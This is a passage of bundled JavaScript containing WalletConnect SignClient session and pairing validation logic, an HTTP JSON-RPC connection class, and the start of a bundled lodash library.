        }, this.isValidEmit = async (e)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(e)) {
                const { message: o } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `emit() params: ${e}`);
                throw new Error(o);
            }
            const { topic: s, event: t, chainId: i } = e;
            await this.isValidSessionTopic(s);
            const { namespaces: n } = this.client.session.get(s);
            if (!(0, $a5d33cfc7f8e5437$export$144fc36610eb6522)(n, i)) {
                const { message: o } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `emit() chainId: ${i}`);
                throw new Error(o);
            }
            if (!(0, $a5d33cfc7f8e5437$export$cbe4cdc5960cfa11)(t)) {
                const { message: o } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `emit() event: ${JSON.stringify(t)}`);
                throw new Error(o);
            }
            if (!(0, $a5d33cfc7f8e5437$export$df2c67ef8baad16b)(n, i, t.name)) {
                const { message: o } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `emit() event: ${JSON.stringify(t)}`);
                throw new Error(o);
            }
        }, this.isValidDisconnect = async (e)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(e)) {
                const { message: t } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `disconnect() params: ${e}`);
                throw new Error(t);
            }
            const { topic: s } = e;
            await this.isValidSessionOrPairingTopic(s);
        }, this.getVerifyContext = async (e, s)=>{
            const t = {
                verified: {
                    verifyUrl: s.verifyUrl || "",
                    validation: "UNKNOWN",
                    origin: s.url || ""
                }
            };
            try {
                const i = await this.client.core.verify.resolve({
                    attestationId: e,
                    verifyUrl: s.verifyUrl
                });
                i && (t.verified.origin = i, t.verified.validation = i === s.url ? "VALID" : "INVALID");
            } catch (i) {
                this.client.logger.error(i);
            }
            return this.client.logger.info(`Verify context: ${JSON.stringify(t)}`), t;
        }, this.validateSessionProps = (e, s)=>{
            Object.values(e).forEach((t)=>{
                if (!(0, $a5d33cfc7f8e5437$export$ee898ca48ab56c74)(t, !1)) {
                    const { message: i } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `${s} must be in Record<string, string> format. Received: ${JSON.stringify(t)}`);
                    throw new Error(i);
                }
            });
        };
    }
    isInitialized() {
        if (!this.initialized) {
            const { message: r } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NOT_INITIALIZED", this.name);
            throw new Error(r);
        }
    }
    registerRelayerEvents() {
        this.client.core.relayer.on((0, $e9e439c110f17033$export$d56245796e2837d).message, async (r)=>{
            const { topic: e, message: s } = r;
            if (this.ignoredPayloadTypes.includes(this.client.core.crypto.getPayloadType(s))) return;
            const t = await this.client.core.crypto.decode(e, s);
            try {
                (0, $2e45abd1d679ec32$export$f6e4034abe07d2a5)(t) ? (this.client.core.history.set(e, t), this.onRelayEventRequest({
                    topic: e,
                    payload: t
                })) : (0, $2e45abd1d679ec32$export$308ba927de2bcbe8)(t) ? (await this.client.core.history.resolve(t), await this.onRelayEventResponse({
                    topic: e,
                    payload: t
                }), this.client.core.history.delete(e, t.id)) : this.onRelayEventUnknownPayload({
                    topic: e,
                    payload: t
                });
            } catch (i) {
                this.client.logger.error(i);
            }
        });
    }
    registerExpirerEvents() {
        this.client.core.expirer.on((0, $e9e439c110f17033$export$9013719d9206b0c1).expired, async (r)=>{
            const { topic: e, id: s } = (0, $a5d33cfc7f8e5437$export$93adeb0f16e8e51d)(r.target);
            if (s && this.client.pendingRequest.keys.includes(s)) return await this.deletePendingSessionRequest(s, (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("EXPIRED"), !0);
            e ? this.client.session.keys.includes(e) && (await this.deleteSession(e, !0), this.client.events.emit("session_expire", {
                topic: e
            })) : s && (await this.deleteProposal(s, !0), this.client.events.emit("proposal_expire", {
                id: s
            }));
        });
    }
    isValidPairingTopic(r) {
        if (!(0, $a5d33cfc7f8e5437$export$ee898ca48ab56c74)(r, !1)) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `pairing topic should be a string: ${r}`);
            throw new Error(e);
        }
        if (!this.client.core.pairing.pairings.keys.includes(r)) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NO_MATCHING_KEY", `pairing topic doesn't exist: ${r}`);
            throw new Error(e);
        }
        if ((0, $a5d33cfc7f8e5437$export$57947cfd429801a2)(this.client.core.pairing.pairings.get(r).expiry)) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("EXPIRED", `pairing topic: ${r}`);
            throw new Error(e);
        }
    }
    async isValidSessionTopic(r) {
        if (!(0, $a5d33cfc7f8e5437$export$ee898ca48ab56c74)(r, !1)) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `session topic should be a string: ${r}`);
            throw new Error(e);
        }
        if (!this.client.session.keys.includes(r)) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NO_MATCHING_KEY", `session topic doesn't exist: ${r}`);
            throw new Error(e);
        }
        if ((0, $a5d33cfc7f8e5437$export$57947cfd429801a2)(this.client.session.get(r).expiry)) {
            await this.deleteSession(r);
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("EXPIRED", `session topic: ${r}`);
            throw new Error(e);
        }
    }
    async isValidSessionOrPairingTopic(r) {
        if (this.client.session.keys.includes(r)) await this.isValidSessionTopic(r);
        else if (this.client.core.pairing.pairings.keys.includes(r)) this.isValidPairingTopic(r);
        else if ((0, $a5d33cfc7f8e5437$export$ee898ca48ab56c74)(r, !1)) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NO_MATCHING_KEY", `session or pairing topic doesn't exist: ${r}`);
            throw new Error(e);
        } else {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `session or pairing topic should be a string: ${r}`);
            throw new Error(e);
        }
    }
    async isValidProposalId(r) {
        if (!(0, $a5d33cfc7f8e5437$export$53551be28ad5e34d)(r)) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `proposal id should be a number: ${r}`);
            throw new Error(e);
        }
        if (!this.client.proposal.keys.includes(r)) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NO_MATCHING_KEY", `proposal id doesn't exist: ${r}`);
            throw new Error(e);
        }
        if ((0, $a5d33cfc7f8e5437$export$57947cfd429801a2)(this.client.proposal.get(r).expiry)) {
            await this.deleteProposal(r);
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("EXPIRED", `proposal id: ${r}`);
            throw new Error(e);
        }
    }
}
class $4a472e843fedf2e2$var$cs extends (0, $e9e439c110f17033$export$390f32400eaf98c9) {
    constructor(r, e){
        super(r, e, $4a472e843fedf2e2$export$ae6c7a4f7ed730a1, $4a472e843fedf2e2$export$7fa6f9ee1e2cab96), this.core = r, this.logger = e;
    }
}
class $4a472e843fedf2e2$var$ls extends (0, $e9e439c110f17033$export$390f32400eaf98c9) {
    constructor(r, e){
        super(r, e, $4a472e843fedf2e2$export$a069e98a8dfeec1e, $4a472e843fedf2e2$export$7fa6f9ee1e2cab96), this.core = r, this.logger = e;
    }
}
class $4a472e843fedf2e2$var$ps extends (0, $e9e439c110f17033$export$390f32400eaf98c9) {
    constructor(r, e){
        super(r, e, $4a472e843fedf2e2$export$40b296af21bd38a4, $4a472e843fedf2e2$export$7fa6f9ee1e2cab96, (s)=>s.id), this.core = r, this.logger = e;
    }
}
class $4a472e843fedf2e2$export$2e2bcd8739ae039 extends (0, $bace94c1ef08d1bc$export$2ebcf6eeacedad44) {
    constructor(r){
        super(r), this.protocol = $4a472e843fedf2e2$export$4fa962fc67384e02, this.version = $4a472e843fedf2e2$export$61085c48796ff049, this.name = $4a472e843fedf2e2$export$8dffb3242f2c5f72.name, this.events = new (0, $7etJZ.EventEmitter), this.on = (s, t)=>this.events.on(s, t), this.once = (s, t)=>this.events.once(s, t), this.off = (s, t)=>this.events.off(s, t), this.removeListener = (s, t)=>this.events.removeListener(s, t), this.removeAllListeners = (s)=>this.events.removeAllListeners(s), this.connect = async (s)=>{
            try {
                return await this.engine.connect(s);
            } catch (t) {
                throw this.logger.error(t.message), t;
            }
        }, this.pair = async (s)=>{
            try {
                return await this.engine.pair(s);
            } catch (t) {
                throw this.logger.error(t.message), t;
            }
        }, this.approve = async (s)=>{
            try {
                return await this.engine.approve(s);
            } catch (t) {
                throw this.logger.error(t.message), t;
            }
        }, this.reject = async (s)=>{
            try {
                return await this.engine.reject(s);
            } catch (t) {
                throw this.logger.error(t.message), t;
            }
        }, this.update = async (s)=>{
            try {
                return await this.engine.update(s);
            } catch (t) {
                throw this.logger.error(t.message), t;
            }
        }, this.extend = async (s)=>{
            try {
                return await this.engine.extend(s);
            } catch (t) {
                throw this.logger.error(t.message), t;
            }
        }, this.request = async (s)=>{
            try {
                return await this.engine.request(s);
            } catch (t) {
                throw this.logger.error(t.message), t;
            }
        }, this.respond = async (s)=>{
            try {
                return await this.engine.respond(s);
            } catch (t) {
                throw this.logger.error(t.message), t;
            }
        }, this.ping = async (s)=>{
            try {
                return await this.engine.ping(s);
            } catch (t) {
                throw this.logger.error(t.message), t;
            }
        }, this.emit = async (s)=>{
            try {
                return await this.engine.emit(s);
            } catch (t) {
                throw this.logger.error(t.message), t;
            }
        }, this.disconnect = async (s)=>{
            try {
                return await this.engine.disconnect(s);
            } catch (t) {
                throw this.logger.error(t.message), t;
            }
        }, this.find = (s)=>{
            try {
                return this.engine.find(s);
            } catch (t) {
                throw this.logger.error(t.message), t;
            }
        }, this.getPendingSessionRequests = ()=>{
            try {
                return this.engine.getPendingSessionRequests();
            } catch (s) {
                throw this.logger.error(s.message), s;
            }
        }, this.name = r?.name || $4a472e843fedf2e2$export$8dffb3242f2c5f72.name, this.metadata = r?.metadata || (0, $a5d33cfc7f8e5437$export$ba31e015127122bb)();
        const e = typeof r?.logger < "u" && typeof r?.logger != "string" ? r.logger : (0, $7fc0ce2591a9daef$exports.pino)((0, $7fc0ce2591a9daef$exports.getDefaultLoggerOptions)({
            level: r?.logger || $4a472e843fedf2e2$export$8dffb3242f2c5f72.logger
        }));
        this.core = r?.core || new (0, $e9e439c110f17033$export$4143ab5b91744744)(r), this.logger = (0, $7fc0ce2591a9daef$exports.generateChildLogger)(e, this.name), this.session = new $4a472e843fedf2e2$var$ls(this.core, this.logger), this.proposal = new $4a472e843fedf2e2$var$cs(this.core, this.logger), this.pendingRequest = new $4a472e843fedf2e2$var$ps(this.core, this.logger), this.engine = new $4a472e843fedf2e2$var$as(this);
    }
    static async init(r) {
        const e = new $4a472e843fedf2e2$export$2e2bcd8739ae039(r);
        return await e.initialize(), e;
    }
    get context() {
        return (0, $7fc0ce2591a9daef$exports.getLoggerContext)(this.logger);
    }
    get pairing() {
        return this.core.pairing.pairings;
    }
    async initialize() {
        this.logger.trace("Initialized");
        try {
            await this.core.start(), await this.session.init(), await this.proposal.init(), await this.pendingRequest.init(), await this.engine.init(), this.core.verify.init({
                verifyUrl: this.metadata.verifyUrl
            }), this.logger.info("SignClient Initialization Success");
        } catch (r) {
            throw this.logger.info("SignClient Initialization Failure"), this.logger.error(r.message), r;
        }
    }
}
const $4a472e843fedf2e2$export$bdf4ba258ec679dc = $4a472e843fedf2e2$export$2e2bcd8739ae039;





var $7etJZ = parcelRequire("7etJZ");

var $R5nvG = parcelRequire("R5nvG");


const $da1642b2b5d2a2fb$var$DEFAULT_HTTP_HEADERS = {
    Accept: "application/json",
    "Content-Type": "application/json"
};
const $da1642b2b5d2a2fb$var$DEFAULT_HTTP_METHOD = "POST";
const $da1642b2b5d2a2fb$var$DEFAULT_FETCH_OPTS = {
    headers: $da1642b2b5d2a2fb$var$DEFAULT_HTTP_HEADERS,
    method: $da1642b2b5d2a2fb$var$DEFAULT_HTTP_METHOD
};
const $da1642b2b5d2a2fb$var$EVENT_EMITTER_MAX_LISTENERS_DEFAULT = 10;
class $da1642b2b5d2a2fb$export$13c1f9cf8a283575 {
    constructor(url, disableProviderPing = false){
        this.url = url;
        this.disableProviderPing = disableProviderPing;
        this.events = new (0, $7etJZ.EventEmitter)();
        this.isAvailable = false;
        this.registering = false;
        if (!(0, $ceb127018999f416$export$206c3129b8bb1b4f)(url)) throw new Error(`Provided URL is not compatible with HTTP connection: ${url}`);
        this.url = url;
        this.disableProviderPing = disableProviderPing;
    }
    get connected() {
        return this.isAvailable;
    }
    get connecting() {
        return this.registering;
    }
    on(event, listener) {
        this.events.on(event, listener);
    }
    once(event, listener) {
        this.events.once(event, listener);
    }
    off(event, listener) {
        this.events.off(event, listener);
    }
    removeListener(event, listener) {
        this.events.removeListener(event, listener);
    }
    async open(url = this.url) {
        await this.register(url);
    }
    async close() {
        if (!this.isAvailable) throw new Error("Connection already closed");
        this.onClose();
    }
    async send(payload, context) {
        if (!this.isAvailable) await this.register();
        try {
            const body = (0, $81c2e06d24b89184$export$abc3f407e87918a4)(payload);
            const res = await (0, (/*@__PURE__*/$parcel$interopDefault($R5nvG)))(this.url, Object.assign(Object.assign({}, $da1642b2b5d2a2fb$var$DEFAULT_FETCH_OPTS), {
                body: body
            }));
            const data = await res.json();
            this.onPayload({
                data: data
            });
        } catch (e) {
            this.onError(payload.id, e);
        }
    }
    async register(url = this.url) {
        if (!(0, $ceb127018999f416$export$206c3129b8bb1b4f)(url)) throw new Error(`Provided URL is not compatible with HTTP connection: ${url}`);
        if (this.registering) {
            const currentMaxListeners = this.events.getMaxListeners();
            if (this.events.listenerCount("register_error") >= currentMaxListeners || this.events.listenerCount("open") >= currentMaxListeners) this.events.setMaxListeners(currentMaxListeners + 1);
            return new Promise((resolve, reject)=>{
                this.events.once("register_error", (error)=>{
                    this.resetMaxListeners();
                    reject(error);
                });
                this.events.once("open", ()=>{
                    this.resetMaxListeners();
                    if (typeof this.isAvailable === "undefined") return reject(new Error("HTTP connection is missing or invalid"));
                    resolve();
                });
            });
        }
        this.url = url;
        this.registering = true;
        try {
            if (!this.disableProviderPing) {
                const body = (0, $81c2e06d24b89184$export$abc3f407e87918a4)({
                    id: 1,
                    jsonrpc: "2.0",
                    method: "test",
                    params: []
                });
                await (0, (/*@__PURE__*/$parcel$interopDefault($R5nvG)))(url, Object.assign(Object.assign({}, $da1642b2b5d2a2fb$var$DEFAULT_FETCH_OPTS), {
                    body: body
                }));
            }
            this.onOpen();
        } catch (e) {
            const error = this.parseError(e);
            this.events.emit("register_error", error);
            this.onClose();
            throw error;
        }
    }
    onOpen() {
        this.isAvailable = true;
        this.registering = false;
        this.events.emit("open");
    }
    onClose() {
        this.isAvailable = false;
        this.registering = false;
        this.events.emit("close");
    }
    onPayload(e) {
        if (typeof e.data === "undefined") return;
        const payload = typeof e.data === "string" ? (0, $81c2e06d24b89184$export$84137bb44359aed5)(e.data) : e.data;
        this.events.emit("payload", payload);
    }
    onError(id, e) {
        const error = this.parseError(e);
        const message = error.message || error.toString();
        const payload = (0, $3bb3ddc7bbc938cc$export$9f7302ae26c3f77)(id, message);
        this.events.emit("payload", payload);
    }
    parseError(e, url = this.url) {
        return (0, $ab82c37acb5ed82a$export$f555d7d8f922e407)(e, url, "HTTP");
    }
    resetMaxListeners() {
        if (this.events.getMaxListeners() > $da1642b2b5d2a2fb$var$EVENT_EMITTER_MAX_LISTENERS_DEFAULT) this.events.setMaxListeners($da1642b2b5d2a2fb$var$EVENT_EMITTER_MAX_LISTENERS_DEFAULT);
    }
}
var $da1642b2b5d2a2fb$export$2e2bcd8739ae039 = $da1642b2b5d2a2fb$export$13c1f9cf8a283575;


var $9fa154a0253fc04e$export$2e2bcd8739ae039 = (0, $da1642b2b5d2a2fb$export$2e2bcd8739ae039);




var $7etJZ = parcelRequire("7etJZ");
const $253fb4de41dc743b$var$Ca = "error", $253fb4de41dc743b$var$Hg = "wss://relay.walletconnect.com", $253fb4de41dc743b$var$$g = "wc", $253fb4de41dc743b$var$Ug = "universal_provider", $253fb4de41dc743b$var$Ia = `${$253fb4de41dc743b$var$$g}@2:${$253fb4de41dc743b$var$Ug}:`, $253fb4de41dc743b$var$Wg = "https://rpc.walletconnect.com/v1", $253fb4de41dc743b$var$ot = {
    DEFAULT_CHAIN_CHANGED: "default_chain_changed"
};
var $253fb4de41dc743b$var$pe = typeof globalThis < "u" ? globalThis : typeof window < "u" ? window : typeof $parcel$global < "u" ? $parcel$global : typeof self < "u" ? self : {}, $253fb4de41dc743b$var$$i = {
    exports: {}
}; /**
 * @license
 * Lodash <https://lodash.com/>
 * Copyright OpenJS Foundation and other contributors <https://openjsf.org/>
 * Released under MIT license <https://lodash.com/license>
 * Based on Underscore.js 1.8.3 <http://underscorejs.org/LICENSE>
 * Copyright Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors
 */ 
(function(C, u) {
    (function() {
        var i, p = "4.17.21", I = 200, D = "Unsupported core-js use. Try https://npms.io/search?q=ponyfill.", F = "Expected a function", Fn = "Invalid `variable` option passed into `_.template`", Gt = "__lodash_hash_undefined__", lr = 500, At = "__lodash_placeholder__", Ln = 1, Mn = 2, Ct = 4, It = 1, de = 2, vn = 1, ft = 2, Mi = 4, Dn = 8, xt = 16, Nn = 32, Et = 64, qn = 128, zt = 256, pr = 512, Ta = 30, La = "...", Da = 800, Na = 16, qi = 1, Ha = 2, $a = 3, ct = 1 / 0, kn = 9007199254740991, Ua = 17976931348623157e292, ge = 0 / 0, Hn = 4294967295, Wa = Hn - 1, Fa = Hn >>> 1, Ma = [
            [
                "ary",
                qn
            ],
            [
                "bind",
                vn
            ],
            [
                "bindKey",
                ft
            ],
            [
                "curry",
                Dn
            ],
            [
                "curryRight",
                xt
            ],
            [
                "flip",
                pr
            ],
            [
                "partial",
                Nn
            ],
            [
                "partialRight",
                Et
            ],
            [
                "rearg",
                zt
            ]
        ], yt = "[object Arguments]", ve = "[object Array]", qa = "[object AsyncFunction]", Kt = "[object Boolean]", Yt = "[object Date]", Ba = "[object DOMException]", _e = "[object Error]", me = "[object Function]", Bi = "[object GeneratorFunction]", yn = "[object Map]", Zt = "[object Number]", Ga = "[object Null]", Bn = "[object Object]", Gi = "[object Promise]", za = "[object Proxy]", Jt = "[object RegExp]", Sn = "[object Set]", Xt = "[object String]", we = "[object Symbol]", Ka = "[object Undefined]", Qt = "[object WeakMap]", Ya = "[object WeakSet]", Vt = "[object ArrayBuffer]", St = "[object DataView]", dr = "[object Float32Array]", gr = "[object Float64Array]", vr = "[object Int8Array]", _r = "[object Int16Array]", mr = "[object Int32Array]", wr = "[object Uint8Array]", Pr = "[object Uint8ClampedArray]", Ar = "[object Uint16Array]", Cr = "[object Uint32Array]", Za = /\b__p \+= '';/g, Ja = /\b(__p \+=) '' \+/g, Xa = /(__e\(.*?\)|\b__t\)) \+\n'';/g, zi = /&(?:amp|lt|gt|quot|#39);/g, Ki = /[&<>"']/g, Qa = RegExp(zi.source), Va = RegExp(Ki.source), ka = /<%-([\s\S]+?)%>/g, ja = /<%([\s\S]+?)%>/g, Yi = /<%=([\s\S]+?)%>/g, no = /\.|\[(?:[^[\]]*|(["'])(?:(?!\1)[^\\]|\\.)*?\1)\]/, to = /^\w*$/, eo = /[^.[\]]+|\[(?:(-?\d+(?:\.\d+)?)|(["'])((?:(?!\2)[^\\]|\\.)*?)\2)\]|(?=(?:\.|\[\])(?:\.|\[\]|$))/g, Ir = /[\\^$.*+?()[\]{}|]/g, ro = RegExp(Ir.source), xr = /^\s+/, io = /\s/, so = /\{(?:\n\/\* \[wrapped with .+\] \*\/)?\n?/, uo = /\{\n\/\* \[wrapped with (.+)\] \*/, ao = /,? & /, oo = /[^\x00-\x2f\x3a-\x40\x5b-\x60\x7b-\x7f]+/g, fo = /[()=,{}\[\]\/\s]/, co = /\\(\\)?/g, ho = /\$\{([^\\}]*(?:\\.[^\\}]*)*)\}/g, Zi = /\w*$/, lo = /^[-+]0x[0-9a-f]+$/i, po = /^0b[01]+$/i, go = /^\[object .+?Constructor\]$/, vo = /^0o[0-7]+$/i, _o = /^(?:0|[1-9]\d*)$/, mo = /[\xc0-\xd6\xd8-\xf6\xf8-\xff\u0100-\u017f]/g, Pe = /($^)/, wo = /['\n\r\u2028\u2029\\]/g, Ae = "\ud800-\udfff", Po = "\\u0300-\\u036f", Ao = "\\ufe20-\\ufe2f", Co = "\\u20d0-\\u20ff", Ji = Po + Ao + Co, Xi = "\\u2700-\\u27bf", Qi = "a-z\\xdf-\\xf6\\xf8-\\xff", Io = "\\xac\\xb1\\xd7\\xf7", xo = "\\x00-\\x2f\\x3a-\\x40\\x5b-\\x60\\x7b-\\xbf", Eo = "\\u2000-\\u206f", yo = " \\t\\x0b\\f\\xa0\\ufeff\\n\\r\\u2028\\u2029\\u1680\\u180e\\u2000\\u2001\\u2002\\u2003\\u2004\\u2005\\u2006\\u2007\\u2008\\u2009\\u200a\\u202f\\u205f\\u3000", Vi = "A-Z\\xc0-\\xd6\\xd8-\\xde", ki = "\\ufe0e\\ufe0f", ji = Io + xo + Eo + yo, Er = "['’]", So = "[" + Ae + "]", ns = "[" + ji + "]", Ce = "[" + Ji + "]", ts = "\\d+", Oo = "[" + Xi + "]", es = "[" + Qi + "]", rs = "[^" + Ae + ji + ts + Xi + Qi + Vi + "]", yr = "\ud83c[\udffb-\udfff]", Ro = "(?:" + Ce + "|" + yr + ")", is = "[^" + Ae + "]", Sr = "(?:\ud83c[\udde6-\uddff]){2}", Or = "[\ud800-\udbff][\udc00-\udfff]", Ot = "[" + Vi + "]", ss = "\\u200d", us = "(?:" + es + "|" + rs + ")", bo = "(?:" + Ot + "|" + rs + ")", as = "(?:" + Er + "(?:d|ll|m|re|s|t|ve))?", os = "(?:" + Er + "(?:D|LL|M|RE|S|T|VE))?", fs = Ro + "?", cs = "[" + ki + "]?", To = "(?:" + ss + "(?:" + [
            is,
            Sr,
            Or
        ].join("|") + ")" + cs + fs + ")*", Lo = "\\d*(?:1st|2nd|3rd|(?![123])\\dth)(?=\\b|[A-Z_])", Do = "\\d*(?:1ST|2ND|3RD|(?![123])\\dTH)(?=\\b|[a-z_])", hs = cs + fs + To, No = "(?:" + [
            Oo,
            Sr,
            Or
        ].join("|") + ")" + hs, Ho = "(?:" + [
            is + Ce + "?",
            Ce,
            Sr,
            Or,
            So
        ].join("|") + ")", $o = RegExp(Er, "g"), Uo = RegExp(Ce, "g"), Rr = RegExp(yr + "(?=" + yr + ")|" + Ho + hs, "g"), Wo = RegExp([
            Ot + "?" + es + "+" + as + "(?=" + [
                ns,
                Ot,
                "$"
            ].join("|") + ")",
            bo + "+" + os + "(?=" + [
                ns,
                Ot + us,
                "$"
            ].join("|") + ")",
            Ot + "?" + us + "+" + as,
            Ot + "+" + os,
            Do,
            Lo,
            ts,
            No
        ].join("|"), "g"), Fo = RegExp("[" + ss + Ae + Ji + ki + "]"), Mo = /[a-z][A-Z]|[A-Z]{2}[a-z]|[0-9][a-zA-Z]|[a-zA-Z][0-9]|[^a-zA-Z0-9 ]/, qo = [
            "Array",
            "Buffer",
            "DataView",
            "Date",
            "Error",
            "Float32Array",
            "Float64Array",
            "Function",
            "Int8Array",
            "Int16Array",
            "Int32Array",
            "Map",
            "Math",
            "Object",
            "Promise",
            "RegExp",
            "Set",
            "String",
            "Symbol",
            "TypeError",
            "Uint8Array",
            "Uint8ClampedArray",
            "Uint16Array",
            "Uint32Array",
            "WeakMap",
            "_",
            "clearTimeout",
            "isFinite",
            "parseInt",
            "setTimeout"
        ], Bo = -1, B = {};
        B[dr] = B[gr] = B[vr] = B[_r] = B[mr] = B[wr] = B[Pr] = B[Ar] = B[Cr] = !0, B[yt] = B[ve] = B[Vt] = B[Kt] = B[St] = B[Yt] = B[_e] = B[me] = B[yn] = B[Zt] = B[Bn] = B[Jt] = B[Sn] = B[Xt] = B[Qt] = !1;
        var q = {};
        q[yt] = q[ve] = q[Vt] = q[St] = q[Kt] = q[Yt] = q[dr] = q[gr] = q[vr] = q[_r] = q[mr] = q[yn] = q[Zt] = q[Bn] = q[Jt] = q[Sn] = q[Xt] = q[we] = q[wr] = q[Pr] = q[Ar] = q[Cr] = !0, q[_e] = q[me] = q[Qt] = !1;
        var Go = {
            À: "A",
            Á: "A",
            Â: "A",
            Ã: "A",
            Ä: "A",
            Å: "A",
            à: "a",
            á: "a",
            â: "a",
            ã: "a",
            ä: "a",
            å: "a",
            Ç: "C",
            ç: "c",
            Ð: "D",
            ð: "d",
            È: "E",
            É: "E",
            Ê: "E",
            Ë: "E",
            è: "e",
            é: "e",
            ê: "e",
            ë: "e",
            Ì: "I",
            Í: "I",
            Î: "I",
            Ï: "I",
            ì: "i",
            í: "i",
            î: "i",
            ï: "i",
            Ñ: "N",
            ñ: "n",
            Ò: "O",
            Ó: "O",
            Ô: "O",
            Õ: "O",
            Ö: "O",
            Ø: "O",
            ò: "o",
            ó: "o",
            ô: "o",
            õ: "o",
            ö: "o",
            ø: "o",
            Ù: "U",
            Ú: "U",
            Û: "U",
            Ü: "U",
            ù: "u",
            ú: "u",
            û: "u",
            ü: "u",
            Ý: "Y",
            ý: "y",
            ÿ: "y",
            Æ: "Ae",
            æ: "ae",
            Þ: "Th",
            þ: "th",
            ß: "ss",
            Ā: "A",
            Ă: "A",
            Ą: "A",
            ā: "a",
            ă: "a",
            ą: "a",
            Ć: "C",
            Ĉ: "C",
            Ċ: "C",
            Č: "C",
            ć: "c",
            ĉ: "c",
            ċ: "c",
            č: "c",
            Ď: "D",
            Đ: "D",
            ď: "d",
            đ: "d",
            Ē: "E",
            Ĕ: "E",
            Ė: "E",
            Ę: "E",
            Ě: "E",
            ē: "e",
            ĕ: "e",
            ė: "e",
            ę: "e",
            ě: "e",
            Ĝ: "G",
            Ğ: "G",
            Ġ: "G",
            Ģ: "G",
            ĝ: "g",
            ğ: "g",
            ġ: "g",
            ģ: "g",
            Ĥ: "H",
            Ħ: "H",
            ĥ: "h",
            ħ: "h",
            Ĩ: "I",
            Ī: "I",
            Ĭ: "I",
            Į: "I",
            İ: "I",
            ĩ: "i",
            ī: "i",
            ĭ: "i",
            į: "i",
            ı: "i",
            Ĵ: "J",
            ĵ: "j",
            Ķ: "K",
            ķ: "k",
            ĸ: "k",
            Ĺ: "L",
            Ļ: "L",
            Ľ: "L",
            Ŀ: "L",
            Ł: "L",
            ĺ: "l",
            ļ: "l",
            ľ: "l",
            ŀ: "l",
            ł: "l",
            Ń: "N",
            Ņ: "N",
            Ň: "N",
            Ŋ: "N",
            ń: "n",
            ņ: "n",
            ň: "n",
            ŋ: "n",
            Ō: "O",
            Ŏ: "O",
            Ő: "O",
            ō: "o",
            ŏ: "o",
            ő: "o",
            Ŕ: "R",
            Ŗ: "R",
            Ř: "R",
            ŕ: "r",
            ŗ: "r",
            ř: "r",
            Ś: "S",
            Ŝ: "S",
            Ş: "S",
            Š: "S",
            ś: "s",
            ŝ: "s",
            ş: "s",
            š: "s",
            Ţ: "T",
            Ť: "T",
            Ŧ: "T",
            ţ: "t",
            ť: "t",
            ŧ: "t",
            Ũ: "U",
            Ū: "U",
            Ŭ: "U",
            Ů: "U",
            Ű: "U",
            Ų: "U",
            ũ: "u",
            ū: "u",
            ŭ: "u",
            ů: "u",
            ű: "u",
            ų: "u",
            Ŵ: "W",
            ŵ: "w",
            Ŷ: "Y",
            ŷ: "y",
            Ÿ: "Y",
            Ź: "Z",
            Ż: "Z",
            Ž: "Z",
            ź: "z",
            ż: "z",
            ž: "z",
            Ĳ: "IJ",
            ĳ: "ij",
            Œ: "Oe",
            œ: "oe",
            ŉ: "'n",
            ſ: "s"
        }, zo = {
            "&": "&amp;",
            "<": "&lt;",
            ">": "&gt;",
            '"': "&quot;",
            "'": "&#39;"
        }, Ko = {
            "&amp;": "&",
            "&lt;": "<",
            "&gt;": ">",
            "&quot;": '"',
            "&#39;": "'"
        }, Yo = {
            "\\": "\\",
            "'": "'",
            "\n": "n",
            "\r": "r",
            "\u2028": "u2028",
            "\u2029": "u2029"
        }, Zo = parseFloat, Jo = parseInt, ls = typeof $253fb4de41dc743b$var$pe == "object" && $253fb4de41dc743b$var$pe && $253fb4de41dc743b$var$pe.Object === Object && $253fb4de41dc743b$var$pe, Xo = typeof self == "object" && self && self.Object === Object && self, k = ls || Xo || Function("return this")(), br = u && !u.nodeType && u, ht = br && !0 && C && !C.nodeType && C, ps = ht && ht.exports === br, Tr = ps && ls.process, _n = function() {
            try {
                var h = ht && ht.require && ht.require("util").types;
                return h || Tr && Tr.binding && Tr.binding("util");
            } catch  {}
        }(), ds = _n && _n.isArrayBuffer, gs = _n && _n.isDate, vs = _n && _n.isMap, _s = _n && _n.isRegExp, ms = _n && _n.isSet, ws = _n && _n.isTypedArray;
        function cn(h, g, d) {
            switch(d.length){
                case 0:
                    return h.call(g);
                case 1:
                    return h.call(g, d[0]);
                case 2:
                    return h.call(g, d[0], d[1]);
                case 3:
                    return h.call(g, d[0], d[1], d[2]);
            }
            return h.apply(g, d);
        }
        function Qo(h, g, d, P) {
            for(var S = -1, $ = h == null ? 0 : h.length; ++S < $;){
                var X = h[S];
                g(P, X, d(X), h);
            }
            return P;
        }
        function mn(h, g) {
            for(var d = -1, P = h == null ? 0 : h.length; ++d < P && g(h[d], d, h) !== !1;);
            return h;
        }
        function Vo(h, g) {
